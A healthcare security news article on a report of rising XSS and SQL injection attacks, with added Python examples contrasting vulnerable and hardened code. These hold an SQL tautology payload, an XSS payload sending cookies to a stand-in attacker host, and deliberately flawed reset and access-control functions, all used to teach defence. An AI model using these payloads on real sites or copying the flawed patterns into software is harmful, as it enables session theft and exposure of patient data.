Dive Brief:
- Web application cyberattacks in the healthcare industry increased 51% in December, as COVID-19 vaccine distribution began, according to a report by Imperva Research Labs released Tuesday.
- Healthcare organizations, on average, were hit by nearly 500 web application attacks every month in 2020, a 10% year-over-year increase, according to Imperva.
- In December, cross-site scripting (XSS) attacks spiked 43%, accounting for the majority of overall web application attacks. SQL injection (SQLi) attacks were the second-largest in volume, increasing 44%, according to Imperva. Protocol manipulation attacks increased 76% and represented the third-largest volume.
Dive Insight:
As the healthcare industry rose to the challenges of the pandemic, bad actors kept pace. General physician offices adopted more third-party solutions and JavaScript APIs to provide more telehealth services, expanding their original attack surface.
Organizations now deliver what were once local applications as web applications through the browser, and every new application added is another target for attackers. Because code is shared and recycled across applications, a single injection flaw tends to recur in many places, which makes preventing injection attacks difficult. XSS, for example, can be exploited in an almost unlimited variety of ways once an application reflects untrusted input into a page.
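To make the two injection classes named in the report concrete, the following is an added example (not code from the article or from Imperva): a constructed in-memory patient-lookup table and a greeting template, each written once in the vulnerable form and once in the hardened form. The table contents, the attacker strings and the function names are all assumptions for illustration.

```python
import html
import sqlite3


def make_db():
    """Constructed sample data: a tiny in-memory 'users' table, not real records."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "patient"), ("bob", "clinician")],
    )
    return conn


def find_user_vulnerable(conn, username):
    # SQLi: the input is spliced into the SQL text, so it can change the query's grammar.
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username):
    # Parameterized query: the value travels separately from the SQL and can only ever be data.
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def render_greeting_vulnerable(display_name):
    # XSS: untrusted text is concatenated straight into HTML.
    return "<p>Welcome, " + display_name + "</p>"


def render_greeting_safe(display_name):
    # Contextual output encoding for an HTML text node (quote=True also covers attribute contexts).
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


# Constructed attacker inputs (assumptions for the demo, not from the report).
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"


def demo():
    """Run both payloads through both variants and summarise what the attacker achieved."""
    conn = make_db()
    return {
        # The tautology turns a single-user lookup into a dump of every row.
        "sqli_vulnerable_rows": len(find_user_vulnerable(conn, SQLI_PAYLOAD)),
        # The same string, bound as a parameter, matches no username at all.
        "sqli_safe_rows": len(find_user_safe(conn, SQLI_PAYLOAD)),
        # Raw concatenation ships a live <script> tag to every viewer of the page.
        "xss_vulnerable_has_script": "<script>" in render_greeting_vulnerable(XSS_PAYLOAD),
        # Escaping leaves only inert &lt;script&gt; text.
        "xss_safe_has_script": "<script>" in render_greeting_safe(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of running the SQL against a real engine rather than just printing the strings is that the vulnerable query genuinely returns every row (2 here) while the parameterized one returns none, and the HTML check shows that escaping, not input filtering, is what neutralises the script tag.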
The spike in web application attacks directly correlates with how "many of the COVID-19 mitigation efforts are powered by new web applications and services," said Terry Ray, SVP and Fellow at Imperva, though the company can't pinpoint exactly why the rise in attacks coincides with vaccine distribution.
"It would not be unreasonable to believe that attackers have found their way into vulnerabilities through connection points. We may not understand the full impact of these attacks for some time, unfortunately," said Ray.
Data breaches rooted in web application flaws are often traced back to issues with:
- Cross-site scripting
- Broken access control
- Password reset flows that fail to invalidate existing sessions
- Server security misconfiguration
- Authentication bypass through broken authentication or session management
Each flaw provides attackers with a variety of execution strategies.
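Two of the flaws in the list above, a password reset that leaves old sessions alive and an access-control check that stops at "is the caller logged in?", are easy to see side by side in code. The following is an added example, not from the article or any product it mentions: a constructed in-memory authentication and session store for a hypothetical patient portal, with the flawed and corrected versions of each operation. Class, method and record names are assumptions for illustration.

```python
import hashlib
import os
import secrets

PBKDF2_ROUNDS = 100_000  # illustrative cost; tune for your hardware


class PortalAuth:
    """Constructed in-memory auth/session store for illustration, not production code."""

    def __init__(self):
        self._creds = {}     # user_id -> (salt, pbkdf2 digest)
        self._sessions = {}  # session_id -> user_id
        self._records = {}   # record_id -> (owner user_id, content)

    def _store_password(self, user_id, password):
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
        self._creds[user_id] = (salt, digest)

    def register(self, user_id, password):
        self._store_password(user_id, password)

    def login(self, user_id, password):
        """Return a fresh session id on success, None on failure."""
        cred = self._creds.get(user_id)
        if cred is None:
            return None
        salt, digest = cred
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
        if not secrets.compare_digest(candidate, digest):
            return None
        sid = secrets.token_urlsafe(32)  # unguessable session identifier
        self._sessions[sid] = user_id
        return sid

    def user_for(self, sid):
        return self._sessions.get(sid)

    def reset_password_naive(self, user_id, new_password):
        # The flaw: credentials change, but every existing session keeps working,
        # including one an attacker may already be holding.
        self._store_password(user_id, new_password)

    def reset_password(self, user_id, new_password):
        self._store_password(user_id, new_password)
        # Revoke every session for this user so a stolen session dies with the old password.
        for sid in [s for s, u in self._sessions.items() if u == user_id]:
            del self._sessions[sid]

    def add_record(self, record_id, owner, content):
        self._records[record_id] = (owner, content)

    def read_record_vulnerable(self, sid, record_id):
        # Broken access control: checks authentication only, never ownership,
        # so any logged-in user can read any record id they can guess.
        if self.user_for(sid) is None:
            return None
        entry = self._records.get(record_id)
        return entry[1] if entry else None

    def read_record(self, sid, record_id):
        user = self.user_for(sid)
        entry = self._records.get(record_id)
        if user is None or entry is None or entry[0] != user:
            return None  # not logged in, no such record, or not the owner
        return entry[1]
```

Running the flawed and fixed variants against the same constructed users shows both failure modes directly: a second logged-in user reads someone else's record through the naive accessor and is refused by the fixed one, and a session issued before a naive reset is still accepted while the proper reset kills it.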
High-profile data breaches, including Equifax and Capital One, were linked to web application issues: an unpatched Apache Struts vulnerability in Equifax's case and a misconfigured web application firewall in Capital One's. In 2018, Equifax's former SVP and CIO for Corporate Global Platforms said the firm's "aggressive growth strategy" piled on technological complexity. Equifax was acquiring other companies while building IT in house. It was a classic scenario of security falling behind fast-paced innovation.
"While many leaders worry that taking time to secure data might slow down their innovation projects, that mindset is indefensible," said Ray. "The answer to a growing number of cyberattacks isn't to throw more point solutions at the issue."
Before cloud-based systems became standard, organizations prioritized perimeter defense over data security. The cloud dissolved that perimeter, and under the shared-responsibility model a web application misconfiguration is almost never the cloud provider's responsibility. Exposed cloud-hosted services, including Docker and Redis instances, are increasingly common, Imperva found in earlier research. This year, healthcare providers rushed to adopt more cloud-based solutions to keep pace with pandemic-related demands.
"In a race to deploy new services, technology is added outside of the purview of the information security team. That means, there are more vulnerabilities to miss than ever before," said Ray. Security is responsible for knowing "where their data is at all times across all environments, how it is used, and who has access to it in order to apply the appropriate controls."
Cyberattacks on the healthcare industry have risen 45% since November, while attacks against other industries have risen at half that rate, according to research from Check Point.
In 2019, healthcare providers became a primary target of ransomware attacks, a trend that continued into 2020 with a CISA alert for the Ryuk ransomware strain. However, "it's only the vulnerable application frontend to all healthcare data that experiences the variety and volume of daily [web application] attacks," according to Imperva.